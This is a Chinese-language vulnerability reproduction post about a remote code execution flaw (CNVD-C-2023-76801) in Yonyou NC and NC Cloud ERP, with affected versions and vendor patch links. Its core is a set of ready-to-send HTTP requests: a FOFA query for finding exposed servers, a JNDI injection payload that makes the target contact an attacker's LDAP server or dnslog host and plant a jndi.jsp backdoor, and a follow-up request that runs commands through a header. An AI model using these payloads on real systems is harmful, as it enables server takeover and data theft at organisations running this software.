【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
产品介绍
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
漏洞概述
用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
影响范围
NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207
复现环境
FOFA:app="用友-NC-Cloud"
漏洞复现
POC(传参中的dnslog自行替换):
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-formurlencoded Content-Length: 285 {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://sqb2c1.dnslog.cn/exp')}","webapps/nc_web/jndi.jsp"]}
利用思路:调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序。
访问上传的文件 jndi.jsp。
GET /jndi.jsp HTTP/1.1 Host: User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-formurlencoded
EXP(VPSip请自行切换):
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-formurlencoded Content-Length: 285 {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}
JNDI注入工具开启监听后
执行命令:
GET /jndi.jsp HTTP/1.1 Host: 127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 cmd: whoami
在这不做演示。
修复建议
打对应补丁,重启服务,各版本补丁获取方式如下:
NC63方案:
补丁名称:NC63uapjs安全问题补丁
补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2
NC633方案:
补丁名称:NC633uapjs安全问题补丁
补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193
https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2
NC65方案:
补丁名称:NC65uapjs安全问题补丁
补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199
https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2
NCC1903方案:
补丁名称:NCC1903uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2
NCC1909方案:
补丁名称:NCC1909uapjs安全问题补丁
补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2
NCC2005方案:
补丁名称:NCC2005uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200
https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2
NCC2105方案:
补丁名称:NCC2105uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2
NCC2111方案:
补丁名称:NCC2111uapjs安全问题补丁
补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318
https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2
YonBIP高级版2207方案:
补丁名称:YonBIP高级版2207uapjs安全问题补丁
补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472
https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2